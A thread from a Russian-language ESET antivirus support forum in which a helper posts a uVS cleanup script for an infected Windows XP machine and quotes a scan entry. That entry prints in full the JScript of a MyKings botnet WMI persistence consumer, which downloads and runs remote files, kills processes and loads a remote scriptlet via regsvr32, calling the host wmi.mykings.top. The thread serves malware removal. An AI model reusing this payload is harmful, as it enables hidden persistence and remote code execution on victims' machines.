Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше.
На данный момент приобретение лицензий ESET через наш сайт недоступно.
В качестве альтернативы предлагаем антивирусные решения
PRO32
— надёжную защиту от киберугроз и высокую производительность для устройств на Windows и Android.
Приглашаем вас присоединиться к новому форуму PRO32.
Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Добавьте лицензию в корзину и примените промокод при оформлении заказа.
| Цитата |
|---|
| Гиргис ас-Самули написал: А что такое ВИ? |
| Цитата |
|---|
| Гиргис ас-Самули написал: А как здесь пристёгивается файл? Я вижу только вставить ссылку. |
| Код |
|---|
;uVS v4.0.5 [http://dsrt.dyndns.org]
;Target OS: NTv5.1
v400c
OFFSGNSAVE
;------------------------autoscript---------------------------
deldirex %SystemDrive%\PROGRAM FILES\CONDUIT\COMMUNITY ALERTS
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\CIS30.EXE
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMIN\APPLICATION DATA\{74AABF24-45E2-FA1E-B28C-350799EDCD80}\D9156FBB.EXE
delref F:\AUTORUN.EXE
delref G:\AUTORUN.EXE
delref HTTP://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DDHDGFFKKEBHMKFJOJEJMPBLDMPOBFKFO%26INSTALLSOURCE%3DONDEMAND%26UC
delref HTTP://SEARCH.CONDUIT.COM/RESULTSEXT.ASPX?Q={SEARCHTERMS}&SEARCHSOURCE=4&CTID=CT2475029
apply
; Conduit Engine
exec C:\PROGRA~1\CONDUI~1\ConduitEngineUninstall.exe
; Java(TM) 6 Update 27
exec MsiExec.exe /X{26A24AE4-039D-4CA4-87B4-2F83216027FF} /quiet
deltmp
delref %SystemDrive%\PROGRAM FILES\HACKER ELIMINATOR\HESHELL.DLL
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
delref {761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\[CLSID]
delref %SystemDrive%\PROGRAM FILES\CONDUITENGINE\PRXCONDUITENGINE.DLL
delref %SystemDrive%\PROGRAM FILES\MYASHAMPOO\PRXTBMYAS.DLL
delref {CA8A9780-280D-11CF-A24D-444553540000}\[CLSID]
delref {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBC}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref %SystemDrive%\PROGRA~1\REALTEK\REALTE~1\IR_SERVER.EXE
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\WONDERSHARE\WONDERSHARE HELPER COMPACT\WSHELPER.EXE
delref %Sys32%\BLANK.HTM
delref {42071714-76D4-11D1-8B24-00A0C9068FF3}\[CLSID]
delref {764BF0E1-F219-11CE-972D-00AA00A14F56}\[CLSID]
delref {853FE2B1-B769-11D0-9C4E-00C04FB6C6FA}\[CLSID]
delref {FAC3CBF6-8697-43D0-BAB9-DCD1FCE19D75}\[CLSID]
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\ARCSOFT\CONNECTION SERVICE\BIN\ACSERVICE.EXE
delref %Sys32%\DRIVERS\CHANGER.SYS
delref %Sys32%\DRIVERS\DGIVECP.SYS
delref %Sys32%\DRIVERS\EWUSBNET.SYS
delref %Sys32%\DRIVERS\EW_HWUSBDEV.SYS
delref %Sys32%\DRIVERS\EW_JUBUSENUM.SYS
delref %Sys32%\DRIVERS\EWUSBMDM.SYS
delref %Sys32%\DRIVERS\I2OMGMT.SYS
delref %Sys32%\DRIVERS\LBRTFDC.SYS
delref %Sys32%\DRIVERS\MASSFILTER.SYS
delref %Sys32%\DRIVERS\PCIDUMP.SYS
delref %Sys32%\DRIVERS\PDCOMP.SYS
delref %Sys32%\DRIVERS\PDFRAME.SYS
delref %Sys32%\DRIVERS\PDRELI.SYS
delref %Sys32%\DRIVERS\PDRFRAME.SYS
delref %SystemDrive%\PROGRAM FILES\PEERGUARDIAN2\PGFILTER.SYS
delref %SystemDrive%\PROGRA~1\RETINA\MODULES\RETINA\SCANNER\RET45.SYS
delref %Sys32%\DRIVERS\SSPORT.SYS
delref %Sys32%\DRIVERS\USBCAMCL.SYS
delref %Sys32%\DRIVERS\VBOXNETFLT.SYS
delref %Sys32%\DRIVERS\WDICA.SYS
delref %Sys32%\DRIVERS\ZTEUSBMDM6K.SYS
delref %Sys32%\DRIVERS\ZTEUSBNMEA.SYS
delref %Sys32%\DRIVERS\ZTEUSBSER6K.SYS
delref %Sys32%\PSXSS.EXE
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\DAO\DAO350.DLL
delref %Sys32%\MCL2AE.AX
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.1\PSMACHINE.DLL
delref %Sys32%\MCM2VE.AX
delref %Sys32%\EAPA3HST.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.15\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\USB 2.0 PC CAMERA\VANFILTER.DLL
delref %SystemDrive%\PROGRAM FILES\CONDUIT\COMMUNITY ALERTS\ALERT.DLL
delref %SystemDrive%\PROGRA~1\NETSUR~1\NETSUR~1.OCX
delref %SystemDrive%\PROGRA~1\MARS_1~1\MARS18SERVERPS.DLL
delref %Sys32%\EAPAHOST.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.1\PSMACHINE.DLL
delref %Sys32%\MCMPEG2MUX.AX
delref %SystemDrive%\PROGRA~1\COMMON~1\WONDER~1\WONDER~1\WSHELPER.EXE
delref %SystemDrive%\PROGRA~1\MARS_1~1\ICOMMONPS.DLL
delref %SystemDrive%\PROGRAM FILES\DVR_UTIL\EMERGENCYAGENT\MIDAS.DLL
delref %SystemDrive%\PROGRAM FILES\COMODO\COMODO INTERNET SECURITY\CMDAGENT.EXE
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.5\PSMACHINE.DLL
delref D:\GAMES\WORLD_~1\WOTTWE~1.EXE
delref F:\LG_PC_PROGRAMS.EXE
delref F:\HTC_SYNC_MANAGER_PC.EXE
delref {16A017B9-6CB4-47C7-8E81-6E9396FAC2B6}\[CLSID]
delref {30F9B915-B755-4826-820B-08FBA6BD249D}\[CLSID]
delref {A1E75A0E-4397-4BA8-BB50-E19FB66890F4}\[CLSID]
delref Z:\CONS.EXE
;-------------------------------------------------------------
restart
|
| Цитата |
|---|
| Полное имя WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER] Имя файла FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER] Тек. статус ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске Удовлетворяет критериям WMI_ACTIVESCRIPTEVENTCONSUMER(CONSUMER_NAME ~ FUCKYOUMM2_CONSUMER)(1) [delall (0)] Сохраненная информация на момент создания образа Статус в автозапуске Namespace \\.\root\subscription Consumer_Name fuckyoumm2_consumer Consumer_Class ActiveScriptEventConsumer Consumer_ScriptingEngine Jscript Consumer_ScriptText var toff=3000;var url1 = "][ттп://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr[i].split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="][ттп://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr[i].split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:][ттп://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa"); Filter_Name fuckyoumm2_filter Filter_Class __EventFilter Filter_Query select * from __timerevent where timerid="fuckyoumm2_itimer" #MOF_Bind# instance of __FilterToConsumerBinding { Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name="fuckyoumm2_consumer""; Filter = "\\\\.\\root\\subscription:__EventFilter.Name="fuckyoumm2_filter""; }; #MOF_Event# instance of __EventFilter { Name = "fuckyoumm2_filter"; Query = "select * from __timerevent where timerid="fuckyoumm2_itimer""; QueryLanguage = "wql"; }; |
